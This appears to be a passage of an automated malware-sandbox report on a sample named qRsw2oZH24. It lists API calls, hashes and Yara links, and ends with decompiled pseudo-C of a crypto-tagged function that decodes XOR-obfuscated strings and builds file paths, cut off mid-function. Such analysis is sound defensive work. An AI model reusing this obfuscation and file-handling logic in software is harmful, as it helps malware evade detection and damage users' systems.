                                    • Instruction ID: 40eba9b15d86dddf688af53a260da8bc5886f7187637a7b125efb27cff929e98
                                    • Opcode Fuzzy Hash: ef38e82b5db20dd9a77e076603fe5bee168e3f549ca89412a6356b250ab393a9
                                    • Instruction Fuzzy Hash: B3F0B43550070DB6CF107AA9EC09CDA7B5CFF01760B508121FE18DA691EB71E9A5CAD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00812B95 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00812BAE
                                      • Part of subcall function 008560E6: FindNextFileW.KERNELBASE(?,?,?,00812C78,?,?,?,?,?,?,?,?,00000000), ref: 008560EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8
                                    • String ID:
                                    • API String ID: 3878998205-0
                                    • Opcode ID: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                    • Instruction ID: dc7550f99f255bfde553d3dc8143db8b52ec37dec7320ce445be7db053493869
                                    • Opcode Fuzzy Hash: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                    • Instruction Fuzzy Hash: 19F0E2312086048BEF38AA19DD15BFAB3ECFF80326F00046DA842D3041EAB0ECE4C651
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088255C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0088838D,00000220,?,?,?,?,?,?,00873E8D,?), ref: 0088258E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 6750c27812b1a2095c995401b0fe945a5360d215590492f840f72d0eb170c792
                                    • Instruction ID: a435d72d1cdcbcb5e860c2779c78c8682e923b5e4dac62993414ee51e0cd156c
                                    • Opcode Fuzzy Hash: 6750c27812b1a2095c995401b0fe945a5360d215590492f840f72d0eb170c792
                                    • Instruction Fuzzy Hash: 16E0ED311C462566DA713669AC21B5B3748FF867A0F160220AC19D61D0CB60CC0083A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082D707 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    • _Deallocate.LIBCONCRT ref: 0082D733
                                      • Part of subcall function 00856107: FindClose.KERNELBASE(000000FF,?,00856136,?,?,?,?,00812C64,?,?,?,?), ref: 00856113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeallocateFind
                                    • String ID:
                                    • API String ID: 3992540829-0
                                    • Opcode ID: 52d89b902ad8bc8221b46583581b4a0ca70aa3b26c674031c9989a50e69e331a
                                    • Instruction ID: d95c49048cc0f5ef998f89d7680d55843b9f180d8e07d700cdf5943789f873a1
                                    • Opcode Fuzzy Hash: 52d89b902ad8bc8221b46583581b4a0ca70aa3b26c674031c9989a50e69e331a
                                    • Instruction Fuzzy Hash: 44F065B79055329F9710DE6DF884455FBE4FE44330325433AE968E3241E721ACA086D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00813139 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___std_fs_copy_file@12.LIBCPMT ref: 0081315D
                                      • Part of subcall function 00812966: __EH_prolog2.LIBCMT ref: 0081296D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog2___std_fs_copy_file@12
                                    • String ID:
                                    • API String ID: 1952593469-0
                                    • Opcode ID: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                    • Instruction ID: b37a0cf91faa6ab84380e2076a0dcb3aafc1505e5da330f70e8d0460c3303264
                                    • Opcode Fuzzy Hash: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                    • Instruction Fuzzy Hash: F5E09231611604778A24594DAC09A97B6AEFFC2B22F10022DB819D3280EF60AA9482E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081290A Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog2.LIBCMT ref: 00812911
                                      • Part of subcall function 00870EF8: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00811283,?,?,?,00811283,?,008B0524), ref: 00870F58
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DispatcherExceptionH_prolog2User
                                    • String ID:
                                    • API String ID: 2516269975-0
                                    • Opcode ID: fcddac29349e9a065299377276f5b2f79adab5a3c53e797725e78fb693a90028
                                    • Instruction ID: 24b88094ab129f75cd74327ef8a6eca4134453d30573b1256f0d6229c5b44205
                                    • Opcode Fuzzy Hash: fcddac29349e9a065299377276f5b2f79adab5a3c53e797725e78fb693a90028
                                    • Instruction Fuzzy Hash: 7DF05E72800118ABDF14EBA4C899EDEBB7CFF15300F004059B219B72A1DB746A88CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00817BE2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00818113), ref: 00817BF7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 5c88d3d629c1185786919cb284939ddd031dc554653343b9fdf7475527b3aa3f
                                    • Instruction ID: f54e6474fc795065c5f77c8c07c2aa8c8f16c0ab9bd1050e76c6fa96d08bbc1e
                                    • Opcode Fuzzy Hash: 5c88d3d629c1185786919cb284939ddd031dc554653343b9fdf7475527b3aa3f
                                    • Instruction Fuzzy Hash: 2FF09231818F51CFD7728B39E408792B6E5BB04725F044A6E92B6829A0DB74E8D6CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085684E Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageA.KERNELBASE(00001300,00000000,?,00000000,?,00000000,00000000), ref: 00856864
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatMessage
                                    • String ID:
                                    • API String ID: 1306739567-0
                                    • Opcode ID: 62e7086306b3dd65350e560383630786567b4d14d515b61772f044d2ac7ad121
                                    • Instruction ID: c766114724842e168f1b3e34fa32d91e0317a69805835be5f3ec79b530765fa2
                                    • Opcode Fuzzy Hash: 62e7086306b3dd65350e560383630786567b4d14d515b61772f044d2ac7ad121
                                    • Instruction Fuzzy Hash: C2D092B2114118BEAA012A959C05CB7BB9CEF097A27418022FE48CA010E5625D2097B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082DF41 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate
                                    • String ID:
                                    • API String ID: 1075933841-0
                                    • Opcode ID: dea7dabacd667da9660dfc4ac44c0dc932a71b932be578fa126ab22ea2662694
                                    • Instruction ID: a80168e4c50077e5ce29cd0a81284216a2bd49fc3bb1aea44bf372d98770af63
                                    • Opcode Fuzzy Hash: dea7dabacd667da9660dfc4ac44c0dc932a71b932be578fa126ab22ea2662694
                                    • Instruction Fuzzy Hash: 0CD05E320043108BF7345E08F0017627BF5EB00314F24091DE0D1C6592CBB958C48699
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088C135 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000000,?,0088C525,?,?,00000000,?,0088C525,00000000,0000000C), ref: 0088C152
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: b9e94bf51f4eea06b56c46f099fbb3c5bef7a891dc195aa0b2f730babbef7351
                                    • Instruction ID: 6a10e05d158b6aa5b8f27678d8392146c38c175a32e4f60b6e2436c312e92775
                                    • Opcode Fuzzy Hash: b9e94bf51f4eea06b56c46f099fbb3c5bef7a891dc195aa0b2f730babbef7351
                                    • Instruction Fuzzy Hash: D2D06C3201010DBBDF029F84DC06EDA3BAAFB48714F054000BA1856020C732E831EB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00855D9C Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,008564D2,00000003,00000003,?,00000080,0089439A), ref: 00855DA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: b516f35f43bbbab84acab6c8fff114132edfa935e77f18bfed0e7252fd8aced9
                                    • Instruction ID: df9c5ee0431fa6e9456869e79c8520216ba42462ce1456402a4ba54907fff3b3
                                    • Opcode Fuzzy Hash: b516f35f43bbbab84acab6c8fff114132edfa935e77f18bfed0e7252fd8aced9
                                    • Instruction Fuzzy Hash: 84C01232105E095A86206B55980C5957669BA10371754C231BE6C845A1DA31C8B9D951
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00875640 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00875653
                                      • Part of subcall function 00880123: RtlFreeHeap.NTDLL(00000000,00000000,?,0087DA9C), ref: 00880139
                                      • Part of subcall function 00880123: GetLastError.KERNEL32(?,?,0087DA9C), ref: 0088014B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: 86a9d97c427f85146f501f1304c3253e814d356a86ef12a33942538bdc0357ba
                                    • Instruction ID: 13fceb4830e7657000432cf6ddb9cc7988619786187c8988242ceba8bf34b18e
                                    • Opcode Fuzzy Hash: 86a9d97c427f85146f501f1304c3253e814d356a86ef12a33942538bdc0357ba
                                    • Instruction Fuzzy Hash: 9BC04C75500208BBDB05EB45D91BA4E7BA9EB80364F204054F41557251DAB5EF449A91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0081B653 Relevance: 25.9, Strings: 20, Instructions: 924COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E0081B653(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t310;
				intOrPtr _t312;
				intOrPtr _t314;
				void* _t316;
				void* _t319;
				char _t322;
				void* _t326;
				void* _t328;
				void* _t329;
				void* _t331;
				intOrPtr _t344;
				intOrPtr _t346;
				void* _t348;
				void* _t349;
				intOrPtr* _t350;
				char _t357;
				intOrPtr _t361;
				intOrPtr _t363;
				void* _t366;
				intOrPtr _t368;
				intOrPtr _t371;
				void* _t373;
				void* _t374;
				intOrPtr _t379;
				void* _t382;
				intOrPtr _t384;
				intOrPtr _t387;
				void* _t389;
				void* _t390;
				intOrPtr _t395;
				void* _t398;
				intOrPtr _t400;
				intOrPtr _t403;
				intOrPtr _t404;
				void* _t405;
				void* _t406;
				intOrPtr _t411;
				void* _t414;
				intOrPtr _t416;
				void* _t419;
				intOrPtr _t420;
				intOrPtr _t421;
				void* _t422;
				void* _t423;
				char _t429;
				char _t433;
				char _t438;
				char _t444;
				char _t448;
				char _t453;
				char _t457;
				char _t461;
				char _t466;
				char _t470;
				char _t474;
				char _t479;
				char _t483;
				void* _t489;
				void* _t494;
				char _t497;
				char _t503;
				char _t513;
				void* _t528;
				intOrPtr _t548;
				void* _t549;
				intOrPtr _t551;
				intOrPtr _t559;
				void* _t565;
				void* _t567;
				void* _t570;
				void* _t581;
				void* _t584;
				void* _t595;
				void* _t598;
				void* _t609;
				void* _t612;
				void* _t625;
				void* _t631;
				void* _t635;
				void* _t639;
				void* _t643;
				void* _t647;
				void* _t666;
				void* _t667;
				intOrPtr* _t683;
				void* _t685;
				intOrPtr _t690;
				void* _t704;
				void* _t706;
				intOrPtr* _t707;
				intOrPtr _t709;
				void* _t710;
				intOrPtr* _t711;
				void* _t713;
				void* _t714;
				intOrPtr _t717;

				L00890CFC(0x8921f3, __ebx, __ecx, __edx);
				_t707 = _t706 - 0x1c8;
				asm("movaps xmm0, [0x8a8d70]");
				_t310 =  *0x8b4e78; // 0x80000030
				_push(__ebx);
				_push(_t683);
				 *((intOrPtr*)(_t704 - 0x10)) = _t707;
				asm("movups [ebp-0x44], xmm0");
				_t690 =  *((intOrPtr*)( *[fs:0x2c]));
				 *((intOrPtr*)(_t704 - 0x34)) = 0x5c4b5d5a;
				 *((intOrPtr*)(_t704 - 0x30)) = 0x5d5c4b58;
				 *((intOrPtr*)(_t704 - 0x2c)) = 0x42435600;
				 *((char*)(_t704 - 0x28)) = 0x2e;
				 *((intOrPtr*)(_t704 - 0x18)) = _t690;
				if(_t310 >  *((intOrPtr*)(_t690 + 4))) {
					_t683 = 0x8b4e78;
					E0086DB91(_t310, 0x8b4e78);
					_t716 =  *0x8b4e78 - 0xffffffff;
					if( *0x8b4e78 == 0xffffffff) {
						E0082D272(0x8b55b4, _t704 - 0x44);
						L0086DFE8(0x8b55b4, _t716, 0x8958fc);
						L0086DB47(0x8b4e78);
					}
				}
				_t717 =  *0x8b55d0; // 0x0
				if(_t717 == 0) {
					L6:
					_push(0x8b55b4);
					E0082E8C7(0, _t704 - 0x144, 0x8b29cc, _t683);
					 *((intOrPtr*)(_t704 - 4)) = 0;
					asm("movaps xmm0, [0x8a8e60]");
					_t312 =  *0x8b51f0; // 0x80000031
					asm("movups [ebp-0x44], xmm0");
					 *((intOrPtr*)(_t704 - 0x34)) = 0x494f404f;
					 *((intOrPtr*)(_t704 - 0x30)) = 0x56005c4b;
					 *((short*)(_t704 - 0x2c)) = 0x4243;
					 *((char*)(_t704 - 0x2a)) = 0x2e;
					if(_t312 >  *((intOrPtr*)(_t690 + 4))) {
						_t683 = 0x8b51f0;
						E0086DB91(_t312, 0x8b51f0);
						_t720 =  *0x8b51f0 - 0xffffffff;
						if( *0x8b51f0 == 0xffffffff) {
							E0082D62A(0x8b61d4, _t704 - 0x44);
							L0086DFE8(0x8b61d4, _t720, 0x8958ea);
							L0086DB47(0x8b51f0);
						}
					}
					if( *0x8b61ee == 0) {
						L12:
						_push(0x8b61d4);
						E0082E8C7(0, _t704 - 0x12c, 0x8b29cc, _t683);
						_t314 = 0xf;
						 *((intOrPtr*)(_t704 - 0x104)) = 0;
						 *((intOrPtr*)(_t704 - 0x100)) = _t314;
						 *((char*)(_t704 - 0x114)) = 0;
						 *((intOrPtr*)(_t704 - 0x64)) = 0;
						 *((intOrPtr*)(_t704 - 0x60)) = _t314;
						 *((char*)(_t704 - 0x74)) = 0;
						 *((char*)(_t704 - 4)) = 3;
						_t662 = _t704 - 0x144;
						 *((char*)(_t704 - 0x14)) = 0;
						_push( *((intOrPtr*)(_t704 - 0x14)));
						L0082FEC9(_t704 - 0x144);
						 *((char*)(_t704 - 4)) = 4;
						_t316 = E00813174(0, _t704 - 0xcc, _t683);
						 *((char*)(_t704 - 4)) = 3;
						_t511 = _t316;
						L0082DD77(_t704 - 0xcc);
						if(_t316 != 0) {
							_t714 = _t707 - 0x18;
							_t647 = _t714;
							 *(_t647 + 0x10) =  *(_t647 + 0x10) & 0x00000000;
							 *(_t647 + 0x14) =  *(_t647 + 0x14) & 0x00000000;
							E0082E0AB(_t647, _t704 - 0x144);
							_t494 = E00818E25(_t511, _t704 - 0xe4, _t662);
							_t649 = _t704 - 0x74;
							_t707 = _t714 + 0x18;
							if(_t704 - 0x74 != _t494) {
								 *((char*)(_t704 - 0x14)) = 0;
								_push( *((intOrPtr*)(_t704 - 0x14)));
								E0082E143(_t649, _t494);
							}
							E0082DF41(_t704 - 0xe4);
						}
						 *((char*)(_t704 - 0x14)) = 0;
						_t663 = _t704 - 0x12c;
						_push( *((intOrPtr*)(_t704 - 0x14)));
						L0082FEC9(_t704 - 0x12c);
						 *((char*)(_t704 - 4)) = 5;
						_t319 = E00813174(_t511, _t704 - 0xcc, _t683);
						 *((char*)(_t704 - 4)) = 3;
						L0082DD77(_t704 - 0xcc);
						if(_t319 == 0) {
							_t513 = 0;
							__eflags = 0;
						} else {
							_t713 = _t707 - 0x18;
							_t643 = _t713;
							_t513 = 0;
							 *((intOrPtr*)(_t643 + 0x10)) = 0;
							 *((intOrPtr*)(_t643 + 0x14)) = 0;
							E0082E0AB(_t643, _t704 - 0x12c);
							_t489 = E00818E25(0, _t704 - 0xe4, _t663);
							_t707 = _t713 + 0x18;
							 *((char*)(_t704 - 4)) = 6;
							E0082D9E5(_t489);
							E0082DF41(_t704 - 0xe4);
						}
						_t528 = _t704 - 0x74;
						if(E0082EA7D(_t528, 0x8a43ab, _t683, _t690) != 0) {
							L104:
							 *((char*)(_t704 - 4)) = 0x16;
							_t322 = E0082EA7D(_t704 - 0x114, 0x8a43ab, _t683, _t690);
							__eflags = _t322;
							if(_t322 != 0) {
								L114:
								E0082DF41(_t704 - 0x74);
								E0082DF41(_t704 - 0x114);
								E0082DF41(_t704 - 0x12c);
								_t326 = E0082DF41(_t704 - 0x144);
								 *[fs:0x0] =  *((intOrPtr*)(_t704 - 0xc));
								return _t326;
							}
							_t666 = 4;
							_t685 = L00818F5D(_t513, _t704 - 0x1a4, _t666);
							_t667 = 5;
							 *((char*)(_t704 - 4)) = 0x17;
							_t328 = L00818F5D(_t513, _t704 - 0x18c, _t667);
							 *((char*)(_t704 - 4)) = 0x18;
							_t329 = E0082E8C7(_t513, _t704 - 0x174, 0x8b2a8c, _t685);
							 *((char*)(_t704 - 4)) = 0x19;
							E0082FA3B(_t704 - 0xe4,  *((intOrPtr*)(_t704 - 0x14)), _t329, _t328, "\\");
							 *((char*)(_t704 - 4)) = 0x1a;
							_t331 = E0082E917(_t704 - 0x15c, _t704 - 0xe4, __eflags, ".");
							_push(_t685);
							_push(_t331);
							 *((char*)(_t704 - 4)) = 0x1b;
							_push( *((intOrPtr*)(_t704 - 0x14)));
							E0082FA3B(_t704 - 0xcc);
							E0082DF41(_t704 - 0x15c);
							E0082DF41(_t704 - 0xe4);
							E0082DF41(_t704 - 0x174);
							E0082DF41(_t704 - 0x18c);
							 *((char*)(_t704 - 4)) = 0x21;
							E0082DF41(_t704 - 0x1a4);
							_t709 = _t707 - 0x18;
							_t548 = _t709;
							 *((intOrPtr*)(_t704 - 0x14)) = _t709;
							 *((intOrPtr*)(_t548 + 0x10)) = _t513;
							 *((intOrPtr*)(_t548 + 0x14)) = _t513;
							E0082E0AB(_t548, _t704 - 0x114);
							_t710 = _t709 - 0x18;
							 *((char*)(_t704 - 4)) = 0x22;
							_t549 = _t710;
							 *((intOrPtr*)(_t549 + 0x10)) = _t513;
							 *((intOrPtr*)(_t549 + 0x14)) = _t513;
							E0082E0AB(_t549, _t704 - 0xcc);
							 *((char*)(_t704 - 4)) = 0x21;
							E00818DC6(_t704 - 0xe4);
							_t711 = _t710 + 0x30;
							__eflags =  *((intOrPtr*)(_t704 - 0xb8)) - 0x10;
							_t694 =  >=  ?  *((void*)(_t704 - 0xcc)) : _t704 - 0xcc;
							 *((intOrPtr*)(_t704 - 0x14)) =  >=  ?  *((void*)(_t704 - 0xcc)) : _t704 - 0xcc;
							_t344 = E0082D2AE(E0081C490());
							_t686 = _t344;
							 *((intOrPtr*)(_t704 - 0x24)) = 0x4b424768;
							 *((intOrPtr*)(_t704 - 0x18)) = _t344;
							 *((intOrPtr*)(_t704 - 0x20)) = 0x42424774;
							 *((short*)(_t704 - 0x1c)) = 0x724f;
							_t551 =  *((intOrPtr*)( *[fs:0x2c]));
							_t346 =  *0x8b5248; // 0x0
							 *((char*)(_t704 - 0x1a)) = 0x2e;
							__eflags = _t346 -  *((intOrPtr*)(_t551 + 4));
							if(_t346 >  *((intOrPtr*)(_t551 + 4))) {
								E0086DB91(_t346, 0x8b5248);
								__eflags =  *0x8b5248 - 0xffffffff;
								_pop(_t565);
								if(__eflags == 0) {
									asm("movsd");
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t565, __eflags, 0x89581f);
									 *_t711 = 0x8b5248;
									L0086DB47();
									_t694 =  *((intOrPtr*)(_t704 - 0x14));
									_t686 =  *((intOrPtr*)(_t704 - 0x18));
								}
							}
							__eflags =  *0x8b5b56;
							if( *0x8b5b56 == 0) {
								L111:
								 *((intOrPtr*)(_t704 - 0xec)) = _t513;
								 *((intOrPtr*)(_t704 - 0xe8)) = 0xf;
								 *((char*)(_t704 - 0xfc)) = _t513;
								L0082DFE8(0x8b5b4c);
								 *((char*)(_t704 - 4)) = 0x23;
								_t348 = E0082E917(_t704 - 0x40, _t704 - 0xfc, __eflags, "[");
								 *((char*)(_t704 - 4)) = 0x24;
								_t349 = E0082E981(_t704 - 0x1d4, _t348, 0x8b2abc);
								 *((char*)(_t704 - 4)) = 0x25;
								_t350 = E0082E917(_t704 - 0x1bc, _t349, __eflags, _t686);
								_pop(_t558);
								 *((char*)(_t704 - 4)) = 0x26;
								__eflags =  *((intOrPtr*)(_t350 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t350 + 0x14)) >= 0x10) {
									_t350 =  *_t350;
								}
								_push(_t558);
								_t559 =  *0x8b4804; // 0x1346140
								E008183DF(_t559, _t350, _t694);
								E0082DF41(_t704 - 0x1bc);
								E0082DF41(_t704 - 0x1d4);
								E0082DF41(_t704 - 0x40);
								E0082DF41(_t704 - 0xfc);
								 *0x8b4891 = 1;
								E0082DF41(_t704 - 0xcc);
								goto L114;
							} else {
								_t357 = _t513;
								do {
									 *(_t357 + 0x8b5b4c) =  *(_t357 + 0x8b5b4c) ^ 0x0000002e;
									_t357 = _t357 + 1;
									__eflags = _t357 - 0xb;
								} while (_t357 < 0xb);
								goto L111;
							}
